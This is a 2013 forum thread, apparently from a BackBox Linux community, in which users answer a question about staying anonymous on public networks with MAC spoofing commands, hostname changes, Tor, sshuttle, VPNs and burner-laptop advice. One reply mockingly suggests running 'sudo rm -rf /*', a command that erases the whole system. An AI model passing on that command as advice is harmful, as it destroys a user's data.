stay invisible in (public) networks?

Started by Stofflowski, February 04, 2013, 11:26:25 PM

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how can i stay as invisible as possible in public networks?

thank you very much


you have to be more precise and explain what you need or what you are trying to do!
btw you can't be invisible!
una voce libera è sempre liberatrice



Don't ask, read :
or just run sudo rm -rf /*


una voce libera è sempre liberatrice


Randomize your MAC address and hostname.  Add "sudo" before each command if necessary.

Edit hostname:
nano /etc/hosts
change the text next to "" to something else.

MAC Address Spoofing:
ifconfig mon0 down hw ether 00:11:22:33:44:55
ifconfig mon0 up

"mon0" is the interface.  The string of numbers can be changed to whatever, but some NICs have restrictions as to what you can spoof it to.

That should do it on the hardware end.  For browsing the internet anonymously use Vidalia (Tor).
All this makes it difficult to track who you are when on a public network.
I call personal information "Open Source"


Run backbox in a vm with a spoofed mac and random hostname and tor should do the trick.


you cannot be invisibal, you can spoof  your mac address, and you can secure your communication and browsing by doing somthing like sshuttle (it's like a vpn forwarded over ssh) once enabled it will tunnel your tcp and dns through it so no one is viewing or capturing your info..was that  what you ment or wanted?


there is no such thing as anonymity on the web...


Switchvpn has been a good vpn provider for me.  They have 24/7 online tech support.  I mainly use the vpn tho to watch tv from all over the world.  I'm American, but wow, our shows... Switch let me have vpn for 10 dollars a month with a PayPal subscription, that I can cancel at any time.  Running openvpn from cli has worked really good on BB3 for me, no drops, lagging etc.

For anonymity, as you know, it depends on the level you need, the job etc.  if you are doing work for a company and need 100% grab a toss away laptop, never hit yer wifi or home network, don't log in to any account, browse anything online associated with your information, social media, etc. and don't keep that lappy at your residence.  If you are doing well enough, you can simply toss it then after your work is complete.  There are many older/used lappys online.  However, remember the Alfa card's mac.  So, depending on the size of the job, the degree of needed security, safety etc. depends on the risk, job, funding.

I'm a small town computer repair guy, will not ever need that degree of anonymity, heck, i can't remember my own passwords, if i lost my usb sticks, i'd be up a creek  :)  

